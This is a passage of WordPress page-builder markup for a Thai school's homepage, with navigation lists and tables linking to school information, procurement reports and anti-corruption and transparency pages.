data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1704\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1754\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1697\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout 